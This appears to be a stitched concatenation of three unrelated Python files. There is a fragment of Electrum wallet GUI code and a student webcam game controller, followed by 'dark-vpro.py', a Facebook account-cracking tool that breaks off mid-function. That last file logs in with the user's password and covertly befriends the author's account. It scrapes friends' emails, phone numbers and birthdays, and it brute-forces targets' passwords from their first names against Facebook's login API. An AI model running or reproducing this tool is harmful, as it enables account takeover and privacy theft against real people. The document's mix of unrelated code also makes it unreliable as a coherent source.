self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
FinalProject_Controller.py
|
"""
This is the controller file for our Ball Drop Game. It provides the
functions that read user input (in our case, from the webcam feed) to control
the gameplay mechanics.
"""
import pygame
from threading import Thread
import time
import sys
# sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages') # in order to import cv2 under python3
import cv2
# sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages') # append back in order to import rospy
import numpy as np
class ImageController:
""" Checks for user input from placing the blocks on the wall projection and
creates a new block based on the properties of this block.
"""
def __init__(self):
""" Initializes OpenCV set up
"""
# Start capturing video from webcam
self.cap = cv2.VideoCapture(0)
# Sets amount of frames stored in the internal buffer memory. Since the
# buffer is only storing 2 frames, we are always getting live feed.
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
# FPS = 1/X
# X = desired FPS. Our webcam has a FPS of 30
self.FPS = 1/30
self.FPS_MS = int(self.FPS * 1000)
# Start frame retrieval thread
self.thread = Thread(target=self.update, args=())
# Stops this thread if the other program stops running
self.thread.daemon = True
self.thread.start()
# Sets font
self.font = cv2.FONT_HERSHEY_COMPLEX
# Set size of the camera,
self.width = int(self.cap.get(3))
self.height = int(self.cap.get(4))
# Sets boolean determining whether to resize frame
self.resizeFrame = False
def get_resized_frame_size(self, new_ratio_width, new_ratio_height):
""" Gets the size of the resized frame given the desired aspect ratio
to resize the original frame by.
Parameters:
new_ratio_width: Ex. for an aspect ratio of 16x9, the user inputs 16
new_ratio_height: Ex. for an aspect ratio of 16x9, the user inputs 9
Returns:
new_dim: new dimensions of frame after resize
"""
unit_len = self.width/new_ratio_width
new_dim = (int(unit_len*new_ratio_width), int(unit_len*new_ratio_height))
return new_dim
def resize_frame(self, frame, new_ratio_width, new_ratio_height):
""" Resize frame inputed to a new aspect ratio.
Parameters:
new_ratio_width: Ex. for an aspect ratio of 16x9, the user inputs 16
new_ratio_height: Ex. for an aspect ratio of 16x9, the user inputs 9
Returns:
new_frame: adjusted frame after resizing
"""
new_dim = self.get_resized_frame_size(new_ratio_width,new_ratio_height)
new_frame = cv2.resize(frame, new_dim)
return new_frame
def update(self):
""" This function is threaded. It updates self.frame automatically every
FPS
"""
while True:
if self.cap.isOpened():
(self.status, temp_frame) = self.cap.read()
if self.resizeFrame:
self.frame = self.resize_frame(temp_frame, 16, 9)
else:
self.frame = temp_frame
time.sleep(self.FPS)
def show_frames(self):
""" Displays mask and webcam feed and waits the desired FPS to sync up video
"""
cv2.imshow('Frame', self.frame)
cv2.imshow("Mask", self.mask)
cv2.waitKey(self.FPS_MS)
def create_trackbars(self):
""" Creates trackbars to calibrate the background. Sets lower and
upper HSV ranges so we can create a mask later of a certain color.
OpenCV HSV ranges: Hue(0-180), Saturation(0-255), Value(0-255). These
values needs to be calibrated and changed before the program can
function properly.
"""
cv2.namedWindow("Trackbars")
# Initialize values for trackbars
cv2.createTrackbar("L-H", "Trackbars", 0, 180, lambda x:x)
cv2.createTrackbar("L-S", "Trackbars", 25, 255, lambda x:x)
cv2.createTrackbar("L-V", "Trackbars", 0, 255, lambda x:x)
cv2.createTrackbar("U-H", "Trackbars", 180, 180, lambda x:x)
cv2.createTrackbar("U-S", "Trackbars", 255, 255, lambda x:x)
cv2.createTrackbar("U-V", "Trackbars", 255, 255, lambda x:x)
def create_hsv_mask(self):
""" Creates mask with HSV values from the trackbar. Adjusts in real time.
"""
# Convert frame into HSV color space
hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)
# Retrieves real time trackbar values.
l_h = cv2.getTrackbarPos("L-H", "Trackbars")
l_s = cv2.getTrackbarPos("L-S", "Trackbars")
l_v = cv2.getTrackbarPos("L-V", "Trackbars")
u_h = cv2.getTrackbarPos("U-H", "Trackbars")
u_s = cv2.getTrackbarPos("U-S", "Trackbars")
u_v = cv2.getTrackbarPos("U-V", "Trackbars")
lower_color = np.array([l_h, l_s, l_v])
upper_color = np.array([u_h, u_s, u_v])
mask = cv2.inRange(hsv, lower_color, upper_color)
# Small square to erode image by.
kernel = np.ones((5, 5), np.uint8)
# Erode makes the object we are masking smaller. Cleans up data by taking
# away random small dots
self.mask = cv2.erode(mask, kernel)
def detect_rectangle(self):
""" Uses contours generated from the mask to detect whether a
rectangle exists in the frame.
Returns:
isRectangle: boolean representing whether there is a rectangle in frame
x: x position of the top right corner of the rectangle detected
y: y position of the top right corner of the rectangle detected
"""
# There is no rectangle at the beginning
isRectangle = False
# Checking OpenCV version because the findContours function is different.
if int(cv2.__version__[0]) > 3:
# Opencv 4.x.x
# Looking for contours in mask. Outputs points in the image.
contours, _ = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
else:
# Opencv 3.x.x
_, contours, _ = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
area = cv2.contourArea(cnt)
# Aproximate sides. True refers to closed polygon
approx = cv2.approxPolyDP(cnt, 0.02*cv2.arcLength(cnt, True), True)
# Get xy positions to place the text
x = approx.ravel()[0]
y = approx.ravel()[1]
# Only detect objects that are bigger to remove noise
if area > 400:
# Draws points found in contours
cv2.drawContours(self.frame, [approx], 0, (0, 0, 0), 5)
# If it detects 4 outlines, then a rectangle exists
if len(approx) == 4:
# Displays text on frame confirming there is a rectangle
cv2.putText(self.frame, "Rectangle", (x, y), self.font, 1, (0, 0, 0))
isRectangle = True
if(isRectangle == True):
return (isRectangle, x, y)
else:
return (False, 0, 0)
def end_capture(self):
"""
Ends current video capture
"""
self.cap.release()
cv2.destroyAllWindows()
class KeyboardController:
""" Checks for user input from clicking keys on the keyboard in order to
move the ball.
Attributes:
is_pressed: boolean indicating whether a key is pressed
key: the event key, shows which key is pressed (up arrow, down
arrow, side arrows)
"""
def __init__(self, is_pressed, key):
""" Assigns provided parameters to a new KeyboardController object. The
attributes of this object will be checked within FinalProject_Model to
control the movement of the ball.
"""
pass
class MouseController:
""" Checks for user input from clicking the mouse in order to click on
buttons.
Attributes:
is_pressed: boolean indicating whether the left mouse button is pressed
x_pos: the x-coordinate of the location on the screen where the mouse
was clicked
y_pos: the y-coordinate of the location on the screen where the mouse
was clicked
"""
def __init__(self, is_pressed, x_pos, y_pos):
""" Assigns provided parameters to a new MouseController object. The
attributes of this object will be checked within FinalProject_Model to
allow the users to navigate the menu pages.
"""
pass
if __name__ == "__main__":
#testing code before moving into main model file
camera = ImageController()
camera.create_trackbars()
pygame.init()
camera.resizeFrame = False
if camera.resizeFrame:
pygame_screen_width, pygame_screen_height = camera.get_resized_frame_size(16,9)
else:
pygame_screen_width, pygame_screen_height = camera.width, camera.height
screen = pygame.display.set_mode([pygame_screen_width, pygame_screen_height])
running = True
while running:
screen.fill((255, 255, 255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
try:
camera.create_hsv_mask()
camera.detect_rectangle()
camera.show_frames()
except AttributeError:
pass
# display pygame graphics
pygame.display.flip()
screen.fill((255, 255, 255))
#press escape key to end
key = cv2.waitKey(1)
if key == 27:
camera.end_capture()
|
dark-vpro.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mREVISI JAY\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR.F0RB1D3N (JAY) \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \1;91m:https://github.com/MrFORBIDEN/ \x1b[1;92m \x1b[92mx1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m083820016316\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n[*] KALO ADA BUG LAPOR KE email [email protected]\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCpVqkAi_sqVf-ZPwzRjME0Q')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
